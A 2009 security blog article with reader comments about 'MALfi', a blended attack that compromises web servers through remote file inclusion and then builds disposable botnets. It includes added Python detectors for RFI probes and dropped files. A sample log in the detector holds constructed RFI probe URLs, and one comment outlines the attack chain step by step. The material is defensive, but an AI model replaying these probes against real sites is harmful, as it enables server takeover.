What's it all about, MALfi?
A blended threat currently detected on over 350,000 Websites and Internet servers, for starters. MALfi is a general, descriptive term applied to the newly emerging blended attack used by hackers and cybercriminals to compromise Websites and servers. MALfi is a combination of RFI (remote file inclusion), LFI (local file inclusion), XSA (cross server attack), and RCE (remote code execution).
One major purpose of MALfi is to establish "use once and throw away" disposable botnets for spam, phishing, distributed denial-of-service (DDoS) attacks, and other exploits.
Conservative estimates over recent months indicate around 350,000 affected Websites and servers worldwide. My organization, HostExploit, and associated researchers have tracked 103,351 attacks, involving 2,743 unique IP addresses, with 85 countries involved in RFI scanning and 911 autonomous system numbers (ASNs -- unique identifiers for every ISP) involved.
MALfi hackers deploy RFI to compromise Websites and upload a remote user interface shell. This gives them partial to full manual (and unauthorized) control over the server. This differs from the now-familiar "drive-by" Website exploit, as it provides hackers with a ready-made arena where Internet plunder, in the form of information, controlled servers, and Websites, is exchanged or resold to cyber criminal groups.
RFI hackers continuously and automatically search for Website vulnerabilities for exploitation. Once breached, the Websites and the now-compromised, underlying servers are used for DDoS attacks and to facilitate further attacks on other targets.
The recent U.S. and Korean government attacks, for example, combined DDoS, spamming, phishing, and large-scale ID theft. Many of the attacks detected on various high-volume governmental and key servers used RFI and similar vulnerability scanning, as well as bots and scripts.
One distinction between RFI scanning and SQL injection/viruses/worms is that RFI happens continuously and affects all corners of the Internet.
There are three distinct stages of the MALfi threat:
- Remote file inclusion attack: Hacked Websites and servers are not infectious to the Web visitor and remain undetected by most AV tools, including, for example, Google's safe browsing feature. This "crack in the door" provides for the second stage.
- Doing damage: Here the compromised Websites and servers have attacker tools uploaded. These consist of both purchased and custom-written tools to conduct nefarious activities such as sending phishing emails, hosting phishing sites, sending spam, hosting malware, defacing, DDoS, and much more. XSA (cross-server attacks), LFI (local file inclusion), and RCE (remote code execution) further compromise the system or other remote systems.
- Detection avoidance: Upon completion of the cybercriminal action or upon discovery of the attack, the miscreant removes their tools or causes them to self-destruct before moving on. With full control of the system, covering their tracks is accomplished easily.
With this technique there is no master server and no simple tracking. The compromised servers are controlled via various anonymous Web proxies and compromised hosts, in a totally decentralized manner. IRC (Internet relay chat) is primarily used in a cell-like communication structure to coordinate efforts and to launch vulnerability scans.
Identification of specific botnets, such as Zeus, Storm, or Cutwail, has been used to gather valuable cyber criminal intelligence, but the decentralized nature of RFI- and MALfi-based attacks requires deeper investigation and wider application of fundamental COMINT (communication intelligence) techniques. Even after being discovered, hackers using the RFI technique still have the often undetected and compromised Websites to reuse or from which to relaunch fresh attacks. The whole process begins again, with scanning for vulnerabilities via a new disposable single-use botnet.
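The continuous, automated RFI scanning described above leaves a recognizable trace in ordinary web server logs: a query parameter whose value is itself an absolute URL to a remote host. The following is an added example, not code from the article or from HostExploit; the log lines, addresses, and paths are constructed, and `allowed_params` is an assumed knob for parameters that legitimately carry URLs (such as a redirect target).

```python
"""Flag remote-file-inclusion (RFI) probes in web server access logs.

Added illustration, not code from the original article. The log lines
below are constructed samples in Apache combined format; the addresses
and paths are invented."""
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log: client IP, then the quoted request line and status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3}) ')
# A query value that is itself an absolute URL is the tell-tale RFI sign.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

SAMPLE_LOG = """\
203.0.113.5 - - [15/Nov/2009:09:47:13 +0000] "GET /index.php?page=http://198.51.100.7/idxx.txt? HTTP/1.1" 200 512
203.0.113.5 - - [15/Nov/2009:09:47:14 +0000] "GET /modules/view.php?inc=ftp://198.51.100.7/copyright.txt HTTP/1.1" 404 221
198.51.100.22 - - [15/Nov/2009:09:48:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 1834
198.51.100.23 - - [15/Nov/2009:09:48:05 +0000] "GET /redirect.php?url=https://www.example.com/ HTTP/1.1" 302 0
"""

def rfi_hits(log_text, allowed_params=()):
    """Return (client_ip, param, remote_url) for each request whose query
    value is an absolute URL; names in allowed_params are skipped (assumed)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = m.group('req').split()   # method, target, protocol
        if len(parts) < 2:
            continue
        for name, value in parse_qsl(urlsplit(parts[1]).query, keep_blank_values=True):
            if name not in allowed_params and REMOTE_RE.match(value):
                hits.append((m.group('ip'), name, value))
    return hits

def scanner_ips(log_text, threshold=2, allowed_params=()):
    """IPs with at least `threshold` probes: the automated scanners rather
    than a single stray request."""
    counts = {}
    for ip, _, _ in rfi_hits(log_text, allowed_params):
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)

if __name__ == "__main__":
    for ip, name, url in rfi_hits(SAMPLE_LOG, allowed_params=("url",)):
        print(f"RFI probe from {ip}: {name}={url}")
    print("scanners:", scanner_ips(SAMPLE_LOG, allowed_params=("url",)))
```

A hit with a 200 status deserves a look at the included file and the server's outbound connections, since a successful include means the web server fetched the remote file itself.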
The how, what, and where of this particular hacking technique and cybercrime business model are provided together with detailed and graphic explanations in the latest HostExploit community research report here.
— Jart Armin, Editor of RBNexploit.com, a watch blog on the infamous RBN (Russian Business Network), and HostExploit.com
Thinkernetter
Monday November 16, 2009 11:59:53 AM
While you never want to give away details of counterintelligence efforts, and I don't agree with releasing zero day information, or even exploits of any kind, whenever the vulnerability was announced, the fact is that the bad guys have more than enough information about this. Thinking that there is a lower level of bad guys out there who don't know the information, while accurate, is irrelevant. The bad guys already sell their most advanced malware to anyone who wants to buy it. They even sell maintenance/update services. They are also already working on their next attacks, and frankly any information you release on the current attacks drives them to modify the attacks proactively.
Thinkernetter
Monday November 16, 2009 9:30:53 AM
Hello Ira,
Obviously there is the initial question as Kurt described “informative, with enough technical spice to make it worth the read” i.e. for this particular IEv environment. I hope, as requested, I provided sufficient general detail within replies to Michael & Kurt, for example.
However, you touch on a much wider debate and I welcome the discussion, re: releasing too much data to the general community. On this wider issue within the SEC research community we are all struggling with this. As a matter of fact, the Conficker Working Group is having an internal debate just about this topic.
My view, and that of many others, is to release enough information to inform and communicate the issue to the general public. It puts the bad guys on notice that we are on to them and their efforts. However, the details and mechanics of the operation are left to a controlled and vetted audience. This way, they derive the benefit of our work, and we are aware of who now has access to the detailed research.
Many in the community seem to have shifted more toward the 'blog or data revelation for self-promotion' mindset, rather than the 'for action and attention' mindset. This is troubling to me and many others.
Although you may say “bad guys are already widely familiar with these attacks and the underlying issues” I would argue only “some of them”, and we also have a responsibility not to openly provide blueprints and data for exploitation to those others who may feel they can follow.
As you will see in the main MALfi article above, this highlights our current challenge for vulnerability reporting, clearly being used as a weapon against us, in an automated form.
I hope you will agree, once again we must turn to responsible disclosure and proper release of critical information.
Thinkernetter
Sunday November 15, 2009 9:34:47 PM
I really don't understand any hesitance in posting the details. The bad guys are already widely familiar with these attacks and the underlying issues. While I don't advocate releasing zero day exploits, that's not the issue here.
IQ Crew
Sunday November 15, 2009 2:17:37 PM
Jart,
I fully understand the quandary and dilemma of posting the detection methods. I also understand and comply with your system settings to limit and block functionality of unneeded services coming to and from the www server.
Thank you for additional info.
Respectfully,
Kurt
Thinkernetter
Sunday November 15, 2009 10:41:40 AM
Yes, the botnets can be sacrificial or disposable, and still maintain the compromised servers in place until needed again.
Hence a "Use once, steal from many botnet!"
Just to add, it does and should change our perspective on botnets as being some form of moribund organizational structure. Here a bad guy could raid a few servers, establish a 20k botnet within a week, utilize MPack, Zeus affiliate, etc., carry out some tailor-made phishing, then shut down, then re-establish elsewhere in, say, a week or so, for a DDoS or other badness.
All the time, a variety of the servers used could simply appear inactive in between sorties. Just to add, a variety of .gov and .edu servers were amongst those acting as attackers.
Thinkernetter
Sunday November 15, 2009 9:47:13 AM
I didn't get that from your original article. I appreciate the clarification. I also was wondering if these servers were still used as C&C servers for other botnets. It seems that they are. Are the botnets sacrificial along with the Web servers? If so, that seems to imply that there are enough vulnerable Web servers to go around. Or, as you mentioned, the bad guys just re-infect the same ones again.
Thinkernetter
Sunday November 15, 2009 7:04:24 AM
Hi Kurt,
Must admit we all were in a quandary on this topic and report in terms of how much detail to include and for whom? We are releasing a much more detailed version of the report, but only available on request. The reason is this very ‘vulnerability’ issue; in fact, with MALfi the bad guys use automated control panels which scan for the latest reported vulnerabilities, e.g. Milw0rm, CERTs, etc., then chase down sites and servers with these.
So it depends on the time of scanning; it could be Apache, PHP, MS server, Java, PDF, and so on. Without frightening anyone, in a 10 min scan on one test we could pick up around 50 of the latest vulnerabilities, and then in just 20 mins over 4,000 web sites and servers that could then be injected, again automatically.
It has made me seriously think how much info we do give openly and freely to the bad guys, in terms of how we provide open searches for vulnerabilities and related techniques. Not sure what the answer is to this; ideas?
Detection:
(a) How we detected was to establish a special MALfi honey pot – hence the results we show just received in this.
(b) For your server / website – a simple method is to do:
- Firstly, for a general understanding: do a Google search for "idxx.txt" and set it for, say, just the last week; you should see around 67,000 for this one example of compromised web sites.
- Note though, the bad guys have become cute here by changing names to, say, “copyright.txt” or also “figure1.jpg”, “sample.php”, etc., which become much harder to generally scan the web for.
- For you and server guys / webmasters simply check directory lists for any .txt, .php, .jpg….. i.e. any file you do not recognize or have not installed. Do inurl Google checks on your domains.
- To repeat - “disallow all outbound communication from their web server that is not needed!”
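The comment's advice to check directory listings for any file you did not install is easiest to act on with a recorded baseline of the deployment. The following is an added example, not code from the commenter or from HostExploit: it hashes the web root at deploy time and later reports files that were added, modified, or removed. The web root is constructed in a temporary directory and the file names are invented.

```python
"""Detect files in a web root that were never part of the deployment.

Added illustration, not code from the original comment: it turns the
"check directory lists for any file you do not recognize" advice into a
baseline comparison. The web root below is constructed in a temporary
directory and its file names are invented."""
import hashlib
import os
import tempfile

def build_baseline(root):
    """Map each path under root (relative, '/'-separated) to its SHA-256.
    Take it at deploy time and after each legitimate update; keep it off-box."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            with open(full, 'rb') as fh:
                baseline[rel] = hashlib.sha256(fh.read()).hexdigest()
    return baseline

def audit(root, baseline):
    """Return (added, modified, missing) versus the stored baseline. Added
    files deserve the first look: dropped tools hide behind names such as
    copyright.txt or figure1.jpg that a quick directory glance forgives."""
    current = build_baseline(root)
    added = sorted(p for p in current if p not in baseline)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    missing = sorted(p for p in baseline if p not in current)
    return added, modified, missing

def demo():
    """Constructed scenario: deploy two files, baseline them, then simulate
    a dropped file and a tampered index.php before auditing."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, 'images'))
        with open(os.path.join(root, 'index.php'), 'w') as fh:
            fh.write('<?php echo "hello"; ?>')
        with open(os.path.join(root, 'images', 'logo.png'), 'wb') as fh:
            fh.write(b'\x89PNG')
        baseline = build_baseline(root)
        with open(os.path.join(root, 'images', 'figure1.jpg'), 'w') as fh:
            fh.write('<?php /* not an image */ ?>')   # PHP hiding behind a .jpg name
        with open(os.path.join(root, 'index.php'), 'a') as fh:
            fh.write('<?php /* tampered */ ?>')
        return audit(root, baseline)

if __name__ == "__main__":
    print(demo())
```

Run the audit from a cron job against a baseline stored off the server, since a fully compromised host can rewrite any baseline kept locally.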
Thinkernetter
Sunday November 15, 2009 5:28:19 AM
Hi Michael,
MALfi - Re: Method of Infection; think of it this way – simple steps and note mostly automated:
- Firstly, establish an IRC (dark) proxy setup and a hacker control panel
- Auto scan for latest available vulnerabilities (Milw0rm, CERTs, etc.)
- Auto scan for websites / servers with such vulnerabilities
- From low hanging fruit or strategically useful sites / servers inject RFI
- Once inside, extend with LFI to take the server and cross-fertilize to other sites on the server
- To infect related servers apply XSA
- Launch RCE – to infect visitors
- Turn infected visitors, now zombies, into botnet
- Control botnet via IRC proxies, and launch DDoS, phishing, exploits, spam… sell or rent botnet
- On any detection, switch off XSA & RCE; still have RFI & LFI for later use
To reduce risk: yes, update server and OS apps, but immediately patch known vulnerabilities. As mentioned earlier: “disallow all outbound communication from their web server that is not needed (web, DNS, etc). If said web server becomes compromised, it at least can't be used as an IRC bot”.
This is now one of the key methods the “bad guys” use to get to typical consumer and business desktops. As stated in the article around 350,000 sites & servers spotted so far, and none infected or detected by conventional means!
IQ Crew
Friday November 13, 2009 4:28:00 PM
Once again Jart rocks the internet. Excellent information, with enough technical spice to make it worth the read. Metasploit is one of the most interesting software inventions since DOS 3.2! The only criticism I have would be you should list which vulnerabilities are being exploited to get the MALfi system uploaded. Most of what I have read seemed to indicate that the O/S is not the problem, but the applications running are the hole used to enter.
My real question is: If the exploit can't be detected, then how are you able to identify them unless they are actively attacking, and not in an idle wait state? This is a point to ponder before using a single server to do multiple jobs. Your Web server and your email server and your FTP server etc. should all be separate systems and behind a firewall.
Thinkernetter
Friday November 13, 2009 2:37:48 PM
Hello, Jart
That was quite a post. I am sorry, I haven't read your report yet. But I am curious about the method of infection. Does RFI scan for known vulnerabilities and exploit them? I think you hinted at that. If so, is part of the solution to make sure the Web server OS and applications are all up-to-date?
Also, I was wondering if the bad guys consider Web servers easier targets now than typical consumer and business desktops. I imagine they like the big pipes and processor power.